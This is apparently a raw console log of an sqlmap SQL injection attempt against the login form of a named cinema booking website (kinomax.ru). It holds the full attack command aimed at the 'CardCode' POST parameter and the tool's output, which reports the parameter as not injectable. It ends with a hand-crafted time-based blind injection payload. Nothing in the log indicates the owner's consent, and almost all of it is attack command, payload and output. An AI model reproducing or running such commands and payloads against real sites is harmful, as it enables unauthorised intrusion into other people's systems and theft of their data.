c:\soft\sqlmap>sqlmap.py -u "kinomax.ru/booknow/" --data "what=Login&CardCode=94102&PIN=passw&cinema_id=31" -p CardCode --technique=T --risk 3 --level 5 --banner --dbms HSQLDB

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 02:33:06

[02:33:08] [INFO] testing connection to the target URL
[02:33:08] [WARNING] heuristic (basic) test shows that POST parameter 'CardCode' might not be injectable
[02:33:08] [INFO] testing for SQL injection on POST parameter 'CardCode'
[02:33:09] [INFO] testing 'HSQLDB >= 1.7.2 AND time-based blind (heavy query)'
[02:33:09] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[02:33:55] [INFO] POST parameter 'CardCode' is 'HSQLDB >= 1.7.2 AND time-based blind (heavy query)' injectable
[02:33:55] [INFO] checking if the injection point on POST parameter 'CardCode' is a false positive
[02:34:14] [WARNING] false positive or unexploitable injection point detected
[02:34:14] [WARNING] POST parameter 'CardCode' is not injectable
[02:34:14] [CRITICAL] all tested parameters appear to be not injectable. Rerun without providing the option '--technique'. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')
[*] shutting down at 02:34:14

CardCode=94102'%2b(select%201%20from%20(select%20sleep(CHAR_LENGTH(VERSION())))A)%2b'